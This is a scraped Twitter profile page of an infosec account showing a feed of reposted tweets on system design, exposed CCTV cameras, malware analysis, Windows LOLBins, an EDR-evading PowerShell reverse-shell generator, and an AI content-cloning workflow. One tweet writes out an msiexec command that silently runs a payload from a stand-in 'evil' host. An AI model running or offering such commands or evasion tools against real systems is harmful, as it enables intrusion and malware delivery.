SecHawk (@sec_hawk) 's Twitter Profile
SecHawk

@sec_hawk

InfoSec | Bug Hunter | Entrepreneur | Futurist •••
Scroll my feed for 1337+ #InfoSec resources 💎 Building @ZSecurityHQ #DataPrivacyActivist

ID: 1387275552101257221

calendar_today28-04-2021 05:20:49

3,3K Tweet

1,1K Followers

2,2K Following

Ashish Pratap Singh (@ashishps_1) 's Twitter Profile Photo

30 Blogs to Learn 30 System Design Concepts: 1. APIs: blog.algomaster.io/p/whats-an-api 2. JWTs: blog.algomaster.io/p/json-web-tok… 3. Webhooks: blog.algomaster.io/p/what-are-web… 4. API Gateways: blog.algomaster.io/p/what-is-an-a… 5. Load Balancing: blog.algomaster.io/p/load-balanci… 6. Proxy vs Reverse Proxy:

30 Blogs to Learn 30 System Design Concepts:

1. APIs: blog.algomaster.io/p/whats-an-api

2. JWTs: blog.algomaster.io/p/json-web-tok…

3. Webhooks: blog.algomaster.io/p/what-are-web…

4. API Gateways: blog.algomaster.io/p/what-is-an-a…

5. Load Balancing: blog.algomaster.io/p/load-balanci…

6. Proxy vs Reverse Proxy:
X (@themsterdoctor1) 's Twitter Profile Photo

Anyone Can Access Your CCTV CAMERAS ☠️📷 CamXploit v2.0.1 Find, analyze, and check for exposed IP cameras with open ports, known vulnerabilities, and weak login credentials. Run Online: lnkd.in/eSDdGk93 GitHub: lnkd.in/erqEsRBD What's New in v2.0.1 Massive port

Anyone Can Access Your CCTV CAMERAS ☠️📷

CamXploit v2.0.1
Find, analyze, and check for exposed IP cameras with open ports, known vulnerabilities, and weak login credentials.

Run Online: lnkd.in/eSDdGk93

GitHub: lnkd.in/erqEsRBD

What's New in v2.0.1

Massive port
YungBinary (@yungbinary) 's Twitter Profile Photo

#CyberStealer malware targets everything from crypto wallets to password managers. New malware analysis blog out now! esentire.com/blog/cyber-ste…

#CyberStealer malware targets everything from crypto wallets to password managers. New malware analysis blog out now!

esentire.com/blog/cyber-ste…
IT Guy (@t3chfalcon) 's Twitter Profile Photo

Did you know… certutil.exe can: Download remote payloads Base64 decode files Write to disk All using a signed Microsoft binary? This LOLBin is trusted by Defender. Attackers love it. Blue teams often miss it. 👊🏾

I am Jakoby (@i_am_jakoby) 's Twitter Profile Photo

Added a new tool to: powershellforhackers.com/tools/revshell/ ⚠️Please Use Responsibly⚠️ You can use this to instantly generate an obfuscated reverse shell in powershell that i have personally used to beat EVERY single EDR out there right now. I've added some pretty cool stuff to my website

Added a new tool to:
powershellforhackers.com/tools/revshell/

⚠️Please Use Responsibly⚠️

You can use this to instantly generate an obfuscated reverse shell in powershell that i have personally used to beat EVERY single EDR out there right now.

I've added some pretty cool stuff to my website
IT Guy (@t3chfalcon) 's Twitter Profile Photo

Most people think .msi files are just installers. But red teamers know better. msiexec.exe /i http://evil[.]com/payload[.]msi /quiet Executes remote payloads No popups Signed Microsoft binary It’s a trusted LOLBin.

HackingHub (@hackinghub_io) 's Twitter Profile Photo

APIs tell you everything (if you listen). Beginners often jump straight to brute forcing but many APIs actually tell you EXACTLY what data they expect! Make sure to look at the error messages as they often include key field names and content requirements.

Ellie Jones (@ellie_jones_ai) 's Twitter Profile Photo

HOLY SH*T… This AI Agent does everything 🤯 Built in n8n : 🔁 Clones viral TikToks ✍️ Rewrites w/ GPT-4o 🎥 Auto creates avatar videos 🎬 Adds captions & edits 📤 Posts to 9 platforms (TikTok, IG, YT, X…) 🔁 Like+RT ✅ Reply “Steal” 🤝 Follow me & I’ll DM you workflow FREE.

HOLY SH*T… This AI Agent does everything 🤯

Built in n8n :
🔁 Clones viral TikToks
✍️ Rewrites w/ GPT-4o
🎥 Auto creates avatar videos
🎬 Adds captions & edits
📤 Posts to 9 platforms (TikTok, IG, YT, X…)

🔁 Like+RT
✅ Reply “Steal”
🤝 Follow me & I’ll DM you  workflow FREE.